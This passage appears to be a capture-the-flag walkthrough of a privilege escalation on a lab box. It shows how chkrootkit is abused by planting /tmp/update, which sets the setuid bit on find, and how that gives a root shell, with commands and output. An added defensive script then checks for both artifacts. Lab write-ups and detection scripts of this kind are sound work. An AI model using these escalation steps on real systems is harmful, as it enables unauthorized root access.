5 privesc amrois > root

# pspy
Every minute there is a burst of activity, and this command is run many times as root (UID=0):

```
2021/09/29 19:44:04 CMD: UID=0    PID=2251   | /bin/sh /usr/bin/chkrootkit
```

Using https://www.exploit-db.com/exploits/33899, which states:

> Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.

```
amrois@nineveh:~$ ls -la /usr/bin/find
-rwxr-xr-x 1 root root 221768 Feb  7  2016 /usr/bin/find

amrois@nineveh:~$ cat << EOF > /tmp/update
> #!/bin/bash
>
> chmod +s /usr/bin/find;
> EOF
amrois@nineveh:~$ chmod +x /tmp/update

amrois@nineveh:~$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 221768 Feb  7  2016 /usr/bin/find

amrois@nineveh:~$ find . -exec /bin/bash -p \; -quit
bash-4.3# whoami;id
root
uid=1000(amrois) gid=1000(amrois) euid=0(root) egid=0(root) groups=0(root),1000(amrois)
```
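
Both artifacts this escalation leaves on disk, an executable `/tmp/update` and a setuid/setgid bit on `/usr/bin/find`, can be checked for from the defender's side. The script below is an added example, not part of the original notes; the function names and the allowlist file are assumptions, and the demo runs on constructed files only.

```shell
#!/bin/sh
# Added example (not from the original notes): checks for the two artifacts above.

# Finding if an executable regular file named "update" sits in the temp dir ($1,
# default /tmp), the path the notes show being executed as root via chkrootkit.
check_tmp_update() {
    f="${1:-/tmp}/update"
    [ -f "$f" ] && [ -x "$f" ] || return 1
    printf 'FINDING: executable %s\n' "$f"
}

# Print setuid/setgid regular files under $1 that are not listed, one absolute
# path per line, in the allowlist file $2 (a baseline you maintain; assumption).
unexpected_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        grep -Fxq -- "$f" "$2" || printf '%s\n' "$f"
    done
}

# Constructed demo: a scratch tree standing in for /tmp and /usr/bin.
demo() {
    d=$(mktemp -d) || return 1
    mkdir "$d/tmp" "$d/bin"
    printf '#!/bin/bash\n' > "$d/tmp/update"; chmod +x "$d/tmp/update"
    : > "$d/bin/find";   chmod 6755 "$d/bin/find"    # mirrors -rwsr-sr-x above
    : > "$d/bin/passwd"; chmod 4755 "$d/bin/passwd"  # expected setuid, allowlisted
    : > "$d/bin/ls";     chmod 0755 "$d/bin/ls"      # no special bits
    printf '%s\n' "$d/bin/passwd" > "$d/allow"
    check_tmp_update "$d/tmp"
    unexpected_suid "$d/bin" "$d/allow"
    rm -rf "$d"
}
demo
```

On a real host, call `check_tmp_update /tmp` and `unexpected_suid /usr/bin <allowlist>` with an allowlist captured from a known-good image.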
